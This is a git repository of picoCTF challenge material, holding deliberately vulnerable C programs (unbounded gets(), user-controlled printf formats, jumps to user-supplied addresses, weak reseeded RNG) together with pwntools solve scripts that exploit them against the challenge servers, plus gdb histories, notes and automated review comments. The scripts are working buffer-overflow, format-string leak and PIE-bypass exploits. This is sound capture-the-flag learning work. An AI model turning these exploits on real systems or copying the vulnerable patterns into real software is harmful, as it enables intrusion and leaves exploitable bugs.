14 Commits

Author SHA1 Message Date
THEON-1
7f8436f98a Clutter Overflow 2025-12-09 12:59:31 +01:00
THEON-1
284e776cd5 flag leak 2025-12-09 11:58:45 +01:00
THEON-1
9acdaa1eed added readme 2025-12-08 14:54:06 +01:00
THEON-1
0fd914ffac RPS 2025-12-08 14:52:34 +01:00
THEON-1
fe67eec9c3 x-sixty-what 2025-12-08 13:36:09 +01:00
THEON-1
9003842333 Basic File Exploit 2025-12-08 11:41:08 +01:00
THEON-1
a3a7081d42 Pie Time 2 2025-12-04 11:53:31 +01:00
THEON-1
18d2c8c2be Pie Time 2025-12-04 11:53:21 +01:00
2d01bffb2a Add README.md 2025-10-27 13:48:39 +00:00
THEON-1
60df42d110 direnvrc 2025-10-07 11:59:10 +02:00
Maxime Vorwerk
8f04827901 packer 2025-02-17 11:27:09 +01:00
Maxime Vorwerk
a02132a1e0 solution 2025-02-17 10:57:37 +01:00
Maxime Vorwerk
6ac770c738 moved weird_snake 2025-02-17 09:15:15 +01:00
Maxime Vorwerk
1ecd3903b4 download 2025-02-15 21:39:01 +01:00
29 changed files with 1121 additions and 0 deletions

12
.envrc Normal file

@@ -0,0 +1,12 @@
export MAMBA_EXE='/home/maxime/.local/bin/micromamba';
export MAMBA_ROOT_PREFIX='/home/maxime/.micromamba';
__mamba_setup="$("$MAMBA_EXE" shell hook --shell zsh --root-prefix "$MAMBA_ROOT_PREFIX" 2> /dev/null)"
if [ $? -eq 0 ]; then
eval "$__mamba_setup"
else
alias micromamba="$MAMBA_EXE" # Fallback on help from micromamba activate
fi
unset __mamba_setup
micromamba activate picoCTF
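Review bot: `MAMBA_EXE` and `MAMBA_ROOT_PREFIX` on the first two lines are hard-coded to one user's home directory, so this `.envrc` only works on the author's machine and elsewhere falls back silently to the bare alias because the hook's stderr is discarded. Derive the paths from `$HOME` and allow an override, e.g. `export MAMBA_EXE="${MAMBA_EXE:-$HOME/.local/bin/micromamba}"` and `export MAMBA_ROOT_PREFIX="${MAMBA_ROOT_PREFIX:-$HOME/.micromamba}"`. Note also that direnv evaluates `.envrc` in bash while the hook is requested with `--shell zsh`; if that output uses zsh-only syntax the `eval` will fail under direnv, which is worth confirming before relying on the activation.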

7
README.md Normal file

@@ -0,0 +1,7 @@
# picoCTF
## programs used
- TrID
- exiftool
- aircrack-ng
- kaitai



@@ -0,0 +1,195 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <stdint.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#define WAIT 60
static const char* flag = "[REDACTED]";
static char data[10][100];
static int input_lengths[10];
static int inputs = 0;
int tgetinput(char *input, unsigned int l)
{
fd_set input_set;
struct timeval timeout;
int ready_for_reading = 0;
int read_bytes = 0;
if( l <= 0 )
{
printf("'l' for tgetinput must be greater than 0\n");
return -2;
}
/* Empty the FD Set */
FD_ZERO(&input_set );
/* Listen to the input descriptor */
FD_SET(STDIN_FILENO, &input_set);
/* Waiting for some seconds */
timeout.tv_sec = WAIT; // WAIT seconds
timeout.tv_usec = 0; // 0 milliseconds
/* Listening for input stream for any activity */
ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
/* Here, first parameter is number of FDs in the set,
* second is our FD set for reading,
* third is the FD set in which any write activity needs to updated,
* which is not required in this case.
* Fourth is timeout
*/
if (ready_for_reading == -1) {
/* Some error has occured in input */
printf("Unable to read your input\n");
return -1;
}
if (ready_for_reading) {
read_bytes = read(0, input, l-1);
if(input[read_bytes-1]=='\n'){
--read_bytes;
input[read_bytes]='\0';
}
if(read_bytes==0){
printf("No data given.\n");
return -4;
} else {
return 0;
}
} else {
printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n");
return -3;
}
return 0;
}
static void data_write() {
char input[100];
char len[4];
long length;
int r;
printf("Please enter your data:\n");
r = tgetinput(input, 100);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
while (true) {
printf("Please enter the length of your data:\n");
r = tgetinput(len, 4);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((length = strtol(len, NULL, 10)) == 0) {
puts("Please put in a valid length");
} else {
break;
}
}
if (inputs > 10) {
inputs = 0;
}
strcpy(data[inputs], input);
input_lengths[inputs] = length;
printf("Your entry number is: %d\n", inputs + 1);
inputs++;
}
static void data_read() {
char entry[4];
long entry_number;
char output[100];
int r;
memset(output, '\0', 100);
printf("Please enter the entry number of your data:\n");
r = tgetinput(entry, 4);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((entry_number = strtol(entry, NULL, 10)) == 0) {
puts(flag);
fseek(stdin, 0, SEEK_END);
exit(0);
}
entry_number--;
strncpy(output, data[entry_number], input_lengths[entry_number]);
puts(output);
}
int main(int argc, char** argv) {
char input[3] = {'\0'};
long command;
int r;
puts("Hi, welcome to my echo chamber!");
puts("Type '1' to enter a phrase into our database");
puts("Type '2' to echo a phrase in our database");
puts("Type '3' to exit the program");
while (true) {
r = tgetinput(input, 3);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((command = strtol(input, NULL, 10)) == 0) {
puts("Please put in a valid number");
} else if (command == 1) {
data_write();
puts("Write successful, would you like to do anything else?");
} else if (command == 2) {
if (inputs == 0) {
puts("No data yet");
continue;
}
data_read();
puts("Read successful, would you like to do anything else?");
} else if (command == 3) {
return 0;
} else {
puts("Please type either 1, 2 or 3");
puts("Maybe breaking boundaries elsewhere will be helpful");
}
}
return 0;
}
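Review bot: In `tgetinput` the result of `read(0, input, l-1)` is used unchecked on the very next line, so a read error (-1) or an EOF with no bytes (0) indexes `input[read_bytes-1]` before the start of the buffer, and when the data contains no newline the buffer is never NUL-terminated even though `strcpy` and `strtol` later treat it as a C string. Guard the result and terminate unconditionally: `ssize_t n = read(0, input, l-1); if (n < 0) { printf("Unable to read your input\n"); return -1; } input[n] = '\0';`, then trim the trailing newline after that. The identical `tgetinput` body is duplicated in rps/game-redacted.c and needs the same change. Separately, `data_write` tests `inputs > 10` before writing `data[inputs]`, which lets index 10 through on a 10-element array (`>= 10` is the bound), and `data_read` uses `entry_number` as an index without checking it against `inputs` or the array size.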

BIN
clutter_overflow/chall Executable file


54
clutter_overflow/chall.c Normal file

@@ -0,0 +1,54 @@
#include <stdio.h>
#include <stdlib.h>
#define SIZE 0x100
#define GOAL 0xdeadbeef
const char* HEADER =
" ______________________________________________________________________\n"
"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n"
"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n"
"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n"
"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ / \\^ ^ |\n"
"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ / \\ ^ _ ^ / | | \\^ ^|\n"
"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | // | /_\\ ^| | ____ ____ | | ^ |\n"
"|^ =|= ^ =================^ ^=|=^| |^=|=^ | | {____}{____} | |^ ^|\n"
"| ^ ^ ^ ^ | ========= |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n"
"|^ ^ ^ ^ ^| / ( \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/ %%%%%%%%%%%%%% \\|^ ^|\n"
".-----. ^ || ) ||^ ^.-------.-------.^| %%%%%%%%%%%%%%%% | ^ |\n"
"| |^ ^|| o ) ( o || ^ | | | | /||||||||||||||||\\ |^ ^|\n"
"| ___ | ^ || | ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n"
"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|== =====\n"
"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n"
"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"";
int main(void)
{
long code = 0;
char clutter[SIZE];
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
puts(HEADER);
puts("My room is so cluttered...");
puts("What do you see?");
gets(clutter);
if (code == GOAL) {
printf("code == 0x%llx: how did that happen??\n", GOAL);
puts("take a flag for your troubles");
system("cat flag.txt");
} else {
printf("code == 0x%llx\n", code);
printf("code != 0x%llx :(\n", GOAL);
}
return 0;
}
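Review bot: `gets(clutter)` after the prompt has no bound and was removed from the language in C11; the same unbounded read appears as `gets(buf)` in x-sixty-what/vuln.c. If the unbounded read is the challenge's intended bug, a one-line comment saying so would help readers; otherwise the bounded form is `fgets(clutter, sizeof clutter, stdin);`. The format strings are also mismatched with their arguments: `code` is a `long` and `GOAL` is an `unsigned int` literal, yet both are printed with `%llx`, which is undefined behaviour and may print stray high bits for `GOAL`; use `%lx` for `code` and `%x` (or cast `GOAL` to `unsigned long long`) instead.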

55
clutter_overflow/sol.py Executable file

@@ -0,0 +1,55 @@
#!/usr/bin/env python
from pwn import *
def get_conn():
#return process("./chall")
return remote("mars.picoctf.net", 31890)
def try_memory_offset(offset):
cycle = cyclic(length=offset, n=8)
conn = get_conn()
conn.recvuntil(b"see?")
conn.recvline()
conn.sendline(cycle)
conn.recvuntil(b"== ")
result = conn.recvline(keepends=False)
conn.close()
return result
base = 0x100
exp = 0
p = log.progress("searching for variable offset")
while True:
offset = base + 2**exp
p.status(f"trying offset {offset}")
try:
result = try_memory_offset(offset)
except:
base = base + 2**(exp-1)
exp = 0
continue
if result != b"0x0":
next_result = 0
i = 0
while result != next_result:
i += 1
result = next_result
next_result = try_memory_offset(offset+i)
offset = cyclic_find(int(result, 16), n=8)
p.success(f"found result {unhex(result[2:])} at offset {offset}")
break
exp += 1
conn = get_conn()
conn.recvuntil(b"see?")
conn.recvline()
conn.sendline(b"a"*offset + p64(0xdeadbeef))
conn.interactive()

2
flag_leak/.gdb_history Normal file

@@ -0,0 +1,2 @@
disassemble main
exit

29
flag_leak/sol.py Executable file

@@ -0,0 +1,29 @@
#!/usr/bin/env python
from pwn import *
buffer_size = 127
hex_to_read = 127//2
hex_reader = b'%x'*hex_to_read
payload = hex_reader + b'.'
log.info(f"payload: {payload}")
def endian_swap(s, offset=0):
result = b''
for i in range(3+offset, len(s), 4):
result += bytes(reversed(s[i-3:i+1]))
return result
conn = remote("saturn.picoctf.net", 65206)
conn.recvuntil(b" >> ")
conn.sendline(payload)
conn.recvline()
data = conn.recvline(keepends=False)[:-1]
log.info(f"received data: {data}")
unhexed_data = unhex(data)
for i in range(4):
endian_swapped_data = endian_swap(unhexed_data, offset=i)
if b"picoCTF" in endian_swapped_data:
break
log.info(f"processed data: {endian_swapped_data}")

BIN
flag_leak/vuln Executable file


46
flag_leak/vuln.c Normal file

@@ -0,0 +1,46 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <wchar.h>
#include <locale.h>
#define BUFSIZE 64
#define FLAGSIZE 64
void readflag(char* buf, size_t len) {
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,len,f); // size bound read
}
void vuln(){
char flag[BUFSIZE];
char story[128];
readflag(flag, FLAGSIZE);
printf("Tell me a story and then I'll tell you one >> ");
scanf("%127s", story);
printf("Here's a story - \n");
printf(story);
printf("\n");
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
return 0;
}
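Review bot: `printf(story)` in `vuln` passes user-controlled input as the format string, which lets a caller read, and potentially write, process memory through the conversion specifiers; the fix is `printf("%s", story);` or `fputs(story, stdout);`. The same pattern appears as `printf(buffer)` in pie_time_2/vuln.c and `printf(buf)` in x-sixty-what/vuln.c. If the non-literal format is the challenge's intended bug, a comment marking it as such would keep readers from filing it as an accident. `readflag` also ignores the result of `fgets`, so a failed or empty read leaves the caller's `flag` buffer uninitialised instead of reporting an error.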

BIN
packer/out Executable file


14
pie_time/.gdb_history Normal file

@@ -0,0 +1,14 @@
exit
exit
help
data
help data
list main
file vuln
list main
exec vuln
exec-file vuln
list main
file vuln
list main
exit

3
pie_time/notes.md Normal file

@@ -0,0 +1,3 @@
- objdump to find adress of main() and win()
- calculate final adress main_address - main_offset + win_offset

BIN
pie_time/vuln Normal file


49
pie_time/vuln.c Normal file

@@ -0,0 +1,49 @@
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void segfault_handler() {
printf("Segfault Occurred, incorrect address.\n");
exit(0);
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
// Read contents from file
c = fgetc(fptr);
while (c != EOF)
{
printf ("%c", c);
c = fgetc(fptr);
}
printf("\n");
fclose(fptr);
}
int main() {
signal(SIGSEGV, segfault_handler);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
printf("Address of main: %p\n", &main);
unsigned long val;
printf("Enter the address to jump to, ex => 0x12345: ");
scanf("%lx", &val);
printf("Your input: %lx\n", val);
void (*foo)(void) = (void (*)())val;
foo();
}
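Review bot: In `win` the value of `fgetc` is stored in a `char` and then compared with `EOF`; `fgetc` returns `int` precisely so that every byte value stays distinguishable from `EOF`, so with `char` the loop either stops early on a 0xFF byte or, where `char` is unsigned, never terminates. Declare it `int c;`. `win` is also declared to return `int` but falls off the end without a return statement, and `segfault_handler` calls `printf` and `exit` from inside a signal handler, neither of which is async-signal-safe (`write` followed by `_exit` is the safe form). The same `win` and handler are duplicated in pie_time_2/vuln.c.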

122
pie_time_2/.gdb_history Normal file

@@ -0,0 +1,122 @@
r
Quit
r
b *0
r
step
step
stepi
next
r
nexti
stepi
break main
r
b
clear 3
clear
exit
break main
r
stepi
stepi
stepi
nexti
step
step
step
step
step
step
step
step
step
step
step
step
step
step
step
exit
b main
r
nexti
stepi
nexti
stack-explore
stackf
hexdump
hexdump $sp
hexdump $sp 128
hexdump $sp 512
ad40a7a0
b main
r
stepi
nexti
r
nexti
step
nexti
stackf
r
nexti
stepi
nexti
stackf
r
nexti
stepi
nexti
stackf
exit
b call_functions
r
nexti
stackf
r
nexti
nexti
stackf
r
nexti
stackf
r
nexti
nexti
stackf
r
nexti
stackf
r
nexti
nexti
stackf
r
nexti
exit
b call_functions+80
b *call_functions+80
r
nexti
stackf
r
nexti
stackf
55559311.f7e0a7a0.f7e0a7a0.55559328.0.340.f7e095c0.252e7825
r
exit
b *call_functions+85
r
stackf
55559311f7e0a7a0f7e0a7a0555593310340f7e095c078257825782578257825782578257825a980000
r
stackf
55559311f7e0a7a0f7e0a7a0555593410340f7e095c0782578257825782578257825782578257825782578257825a0051675000ffffcff055555441ffffd090f7c27635f7fc2000ffffd118ffffd050
r
stackf
r
stackf
r
stackf
exit

30
pie_time_2/notes.md Normal file

@@ -0,0 +1,30 @@
# find main layout with `objdump -d --disassemble=main vuln`
```assembly
0000000000001400 <main>:
1400: f3 0f 1e fa endbr64
1404: 55 push %rbp
1405: 48 89 e5 mov %rsp,%rbp
1408: 48 8d 35 9a fe ff ff lea -0x166(%rip),%rsi # 12a9 <segfault_handler>
140f: bf 0b 00 00 00 mov $0xb,%edi
1414: e8 57 fd ff ff call 1170 <signal@plt>
1419: 48 8b 05 f0 2b 00 00 mov 0x2bf0(%rip),%rax # 4010 <stdout@GLIBC_2.2.5>
1420: b9 00 00 00 00 mov $0x0,%ecx
1425: ba 02 00 00 00 mov $0x2,%edx
142a: be 00 00 00 00 mov $0x0,%esi
142f: 48 89 c7 mov %rax,%rdi
1432: e8 49 fd ff ff call 1180 <setvbuf@plt>
1437: b8 00 00 00 00 mov $0x0,%eax
143c: e8 86 fe ff ff call 12c7 <call_functions>
1441: b8 00 00 00 00 mov $0x0,%eax
1446: 5d pop %rbp
1447: c3 ret
```
# find `main` and `win` locations
```
000000000000136a g F .text 0000000000000096 win
0000000000001400 g F .text 0000000000000048 main
```
# find buffer offset to read return address into `main` via gdb
- %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx
- return value $\leftrightarrow$ *main+65 after dot

24
pie_time_2/sol.py Executable file

@@ -0,0 +1,24 @@
#!/usr/bin/env python
from pwn import *
#conn = process("./vuln")
conn = remote('rescued-float.picoctf.net', 49587)
conn.recvuntil(b'name:')
conn.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx')
conn.recvuntil(b'.')
return_addr = int(conn.recvline(), 16)
log.info(f"received return addr: {return_addr}")
conn.recvuntil(b'12345: ')
main_offset = 0x1400
win_offset = 0x136a
call_fun_ret_offset = 65
main_addr = return_addr - call_fun_ret_offset
win_offset = main_addr - main_offset + win_offset
conn.sendline(f'{hex(win_offset)}'.encode())
conn.recvline()
conn.interactive()

BIN
pie_time_2/vuln Executable file


56
pie_time_2/vuln.c Normal file

@@ -0,0 +1,56 @@
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void segfault_handler() {
printf("Segfault Occurred, incorrect address.\n");
exit(0);
}
void call_functions() {
char buffer[64];
printf("Enter your name:");
fgets(buffer, 64, stdin);
printf(buffer);
unsigned long val;
printf(" enter the address to jump to, ex => 0x12345: ");
scanf("%lx", &val);
void (*foo)(void) = (void (*)())val;
foo();
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
// Read contents from file
c = fgetc(fptr);
while (c != EOF)
{
printf ("%c", c);
c = fgetc(fptr);
}
printf("\n");
fclose(fptr);
}
int main() {
signal(SIGSEGV, segfault_handler);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
call_functions();
return 0;
}

154
rps/game-redacted.c Normal file

@@ -0,0 +1,154 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#define WAIT 60
static const char* flag = "[REDACTED]";
char* hands[3] = {"rock", "paper", "scissors"};
char* loses[3] = {"paper", "scissors", "rock"};
int wins = 0;
int tgetinput(char *input, unsigned int l)
{
fd_set input_set;
struct timeval timeout;
int ready_for_reading = 0;
int read_bytes = 0;
if( l <= 0 )
{
printf("'l' for tgetinput must be greater than 0\n");
return -2;
}
/* Empty the FD Set */
FD_ZERO(&input_set );
/* Listen to the input descriptor */
FD_SET(STDIN_FILENO, &input_set);
/* Waiting for some seconds */
timeout.tv_sec = WAIT; // WAIT seconds
timeout.tv_usec = 0; // 0 milliseconds
/* Listening for input stream for any activity */
ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
/* Here, first parameter is number of FDs in the set,
* second is our FD set for reading,
* third is the FD set in which any write activity needs to updated,
* which is not required in this case.
* Fourth is timeout
*/
if (ready_for_reading == -1) {
/* Some error has occured in input */
printf("Unable to read your input\n");
return -1;
}
if (ready_for_reading) {
read_bytes = read(0, input, l-1);
if(input[read_bytes-1]=='\n'){
--read_bytes;
input[read_bytes]='\0';
}
if(read_bytes==0){
printf("No data given.\n");
return -4;
} else {
return 0;
}
} else {
printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n");
return -3;
}
return 0;
}
bool play () {
char player_turn[100];
srand(time(0));
int r;
printf("Please make your selection (rock/paper/scissors):\n");
r = tgetinput(player_turn, 100);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
int computer_turn = rand() % 3;
printf("You played: %s\n", player_turn);
printf("The computer played: %s\n", hands[computer_turn]);
if (strstr(player_turn, loses[computer_turn])) {
puts("You win! Play again?");
return true;
} else {
puts("Seems like you didn't win this time. Play again?");
return false;
}
}
int main () {
char input[3] = {'\0'};
int command;
int r;
puts("Welcome challenger to the game of Rock, Paper, Scissors");
puts("For anyone that beats me 5 times in a row, I will offer up a flag I found");
puts("Are you ready?");
while (true) {
puts("Type '1' to play a game");
puts("Type '2' to exit the program");
r = tgetinput(input, 3);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((command = strtol(input, NULL, 10)) == 0) {
puts("Please put in a valid number");
} else if (command == 1) {
printf("\n\n");
if (play()) {
wins++;
} else {
wins = 0;
}
if (wins >= 5) {
puts("Congrats, here's the flag!");
puts(flag);
}
} else if (command == 2) {
return 0;
} else {
puts("Please type either 1 or 2");
}
}
return 0;
}
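Review bot: `play` calls `srand(time(0))` on every round, so the generator is reseeded with one-second resolution and `rand() % 3` yields the same hand for every round played within the same second; seed once at the top of `main` and let `rand` advance between rounds. `tgetinput` here is a byte-for-byte copy of the one in the other challenge source in this commit, including its unchecked `read()` result and missing NUL termination, so it should be fixed in both places. In `main`, `command` is an `int` receiving `strtol`'s `long`, which silently truncates out-of-range input; `long command;` matches the other program in this commit.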

32
rps/sol.py Executable file

@@ -0,0 +1,32 @@
#!/usr/bin/env python
from pwn import *
wins = 0
rounds = 0
def play_round(wins):
conn.recvuntil(b"exit the program")
conn.recvline()
conn.sendline(b"1")
conn.recvuntil(b"s):")
conn.recvline()
conn.sendline(b"rock")
conn.recvuntil(b"computer played")
conn.recvline()
result = conn.recvline()
if b"You win" in result:
return wins+1
else:
return 0
conn = remote("saturn.picoctf.net", 49891)
p = log.progress("brute-forcing solution")
while wins < 5:
rounds += 1
wins = play_round(wins)
p.status(f"round {rounds}, wins: {wins}")
p.success("won 5 rounds")
conn.interactive()

19
weird_snake/rec.py Executable file

@@ -0,0 +1,19 @@
#!/bin/env python
input_list = [4, 54, 41, 0, 112, 32, 25, 49, 33, 3, 0, 0, 57, 32, 108, 23, 48, 4, 9, 70, 7, 110, 36, 8, 108, 7, 49, 10, 4, 86, 43, 110, 43, 88, 0, 67, 104, 125, 9, 78]
key_str = 'J'
key_str = '_' + key_str
key_str = key_str + 'o'
key_str = key_str + '3'
key_str = 't' + key_str
key_list = [ord(char) for char in key_str]
while len(key_list) < len(input_list):
key_list += key_list
result = [a^b for (a, b) in zip(input_list, key_list)]
result_text = ''.join(map(chr, result))
print(result_text)
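Review bot: The shebang `#!/bin/env python` differs from the `#!/usr/bin/env python` used by every other script in this commit, and `/bin/env` does not exist on systems where `/bin` is not merged into `/usr/bin`, so the file fails to run directly there. Use `#!/usr/bin/env python` for consistency. The five-step assembly of `key_str` mirrors the bytecode it was reconstructed from, so a comment such as `# key built step by step to match the disassembled snake.py` would explain why it is not simply `key_str = 't_Jo3'`.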

137
weird_snake/snake Normal file

@@ -0,0 +1,137 @@
1 0 LOAD_CONST 0 (4)
2 LOAD_CONST 1 (54)
4 LOAD_CONST 2 (41)
6 LOAD_CONST 3 (0)
8 LOAD_CONST 4 (112)
10 LOAD_CONST 5 (32)
12 LOAD_CONST 6 (25)
14 LOAD_CONST 7 (49)
16 LOAD_CONST 8 (33)
18 LOAD_CONST 9 (3)
20 LOAD_CONST 3 (0)
22 LOAD_CONST 3 (0)
24 LOAD_CONST 10 (57)
26 LOAD_CONST 5 (32)
28 LOAD_CONST 11 (108)
30 LOAD_CONST 12 (23)
32 LOAD_CONST 13 (48)
34 LOAD_CONST 0 (4)
36 LOAD_CONST 14 (9)
38 LOAD_CONST 15 (70)
40 LOAD_CONST 16 (7)
42 LOAD_CONST 17 (110)
44 LOAD_CONST 18 (36)
46 LOAD_CONST 19 (8)
48 LOAD_CONST 11 (108)
50 LOAD_CONST 16 (7)
52 LOAD_CONST 7 (49)
54 LOAD_CONST 20 (10)
56 LOAD_CONST 0 (4)
58 LOAD_CONST 21 (86)
60 LOAD_CONST 22 (43)
62 LOAD_CONST 17 (110)
64 LOAD_CONST 22 (43)
66 LOAD_CONST 23 (88)
68 LOAD_CONST 3 (0)
70 LOAD_CONST 24 (67)
72 LOAD_CONST 25 (104)
74 LOAD_CONST 26 (125)
76 LOAD_CONST 14 (9)
78 LOAD_CONST 27 (78)
80 BUILD_LIST 40
82 STORE_NAME 0 (input_list)
2 84 LOAD_CONST 28 ('J')
86 STORE_NAME 1 (key_str)
3 88 LOAD_CONST 29 ('_')
90 LOAD_NAME 1 (key_str)
92 BINARY_ADD
94 STORE_NAME 1 (key_str)
4 96 LOAD_NAME 1 (key_str)
98 LOAD_CONST 30 ('o')
100 BINARY_ADD
102 STORE_NAME 1 (key_str)
5 104 LOAD_NAME 1 (key_str)
106 LOAD_CONST 31 ('3')
108 BINARY_ADD
110 STORE_NAME 1 (key_str)
6 112 LOAD_CONST 32 ('t')
114 LOAD_NAME 1 (key_str)
116 BINARY_ADD
118 STORE_NAME 1 (key_str)
9 120 LOAD_CONST 33 (<code object <listcomp> at 0x7ffb38066d40, file "snake.py", line 9>)
122 LOAD_CONST 34 ('<listcomp>')
124 MAKE_FUNCTION 0
126 LOAD_NAME 1 (key_str)
128 GET_ITER
130 CALL_FUNCTION 1
132 STORE_NAME 2 (key_list)
11 >> 134 LOAD_NAME 3 (len)
136 LOAD_NAME 2 (key_list)
138 CALL_FUNCTION 1
140 LOAD_NAME 3 (len)
142 LOAD_NAME 0 (input_list)
144 CALL_FUNCTION 1
146 COMPARE_OP 0 (<)
148 POP_JUMP_IF_FALSE 162
12 150 LOAD_NAME 2 (key_list)
152 LOAD_METHOD 4 (extend)
154 LOAD_NAME 2 (key_list)
156 CALL_METHOD 1
158 POP_TOP
160 JUMP_ABSOLUTE 134
15 >> 162 LOAD_CONST 35 (<code object <listcomp> at 0x7ffb38066df0, file "snake.py", line 15>)
164 LOAD_CONST 34 ('<listcomp>')
166 MAKE_FUNCTION 0
168 LOAD_NAME 5 (zip)
170 LOAD_NAME 0 (input_list)
172 LOAD_NAME 2 (key_list)
174 CALL_FUNCTION 2
176 GET_ITER
178 CALL_FUNCTION 1
180 STORE_NAME 6 (result)
18 182 LOAD_CONST 36 ('')
184 LOAD_METHOD 7 (join)
186 LOAD_NAME 8 (map)
188 LOAD_NAME 9 (chr)
190 LOAD_NAME 6 (result)
192 CALL_FUNCTION 2
194 CALL_METHOD 1
196 STORE_NAME 10 (result_text)
198 LOAD_CONST 37 (None)
200 RETURN_VALUE
Disassembly of <code object <listcomp> at 0x7ffb38066d40, file "snake.py", line 9>:
9 0 BUILD_LIST 0
2 LOAD_FAST 0 (.0)
>> 4 FOR_ITER 12 (to 18)
6 STORE_FAST 1 (char)
8 LOAD_GLOBAL 0 (ord)
10 LOAD_FAST 1 (char)
12 CALL_FUNCTION 1
14 LIST_APPEND 2
16 JUMP_ABSOLUTE 4
>> 18 RETURN_VALUE
Disassembly of <code object <listcomp> at 0x7ffb38066df0, file "snake.py", line 15>:
15 0 BUILD_LIST 0
2 LOAD_FAST 0 (.0)
>> 4 FOR_ITER 16 (to 22)
6 UNPACK_SEQUENCE 2
8 STORE_FAST 1 (a)
10 STORE_FAST 2 (b)
12 LOAD_FAST 1 (a)
14 LOAD_FAST 2 (b)
16 BINARY_XOR
18 LIST_APPEND 2
20 JUMP_ABSOLUTE 4
>> 22 RETURN_VALUE

25
x-sixty-what/.gdb_history Normal file

@@ -0,0 +1,25 @@
show vuln
list vuln
b vuln
exit
info functions
list main
disassemble main
disasm main
disassemble main
disassemble *main
b vuln
exit
disassemble main
disassemble vuln
b vuln+2
b *vuln+2
exit
disassemble vuln
b *vuln+24
run
stackf
nexti
stackf
disassemble flag
exit

19
x-sixty-what/sol.py Executable file

@@ -0,0 +1,19 @@
#!/usr/bin/env python
from pwn import *
buffer_base = 0x7fffffffcf70
ret_addr = 0x7fffffffcfb8
ret_offset = ret_addr - buffer_base
flag_fun_addr = 0x0000000000401236
flag_fun_offset = 5
target_addr = flag_fun_addr + flag_fun_offset
send_buffer = b"a"*ret_offset + p64(target_addr, 'little')
#conn = process("./vuln")
conn = remote('saturn.picoctf.net', 60832)
conn.recvline()
conn.sendline(send_buffer)
conn.interactive()

BIN
x-sixty-what/vuln Executable file


37
x-sixty-what/vuln.c Normal file

@@ -0,0 +1,37 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFFSIZE 64
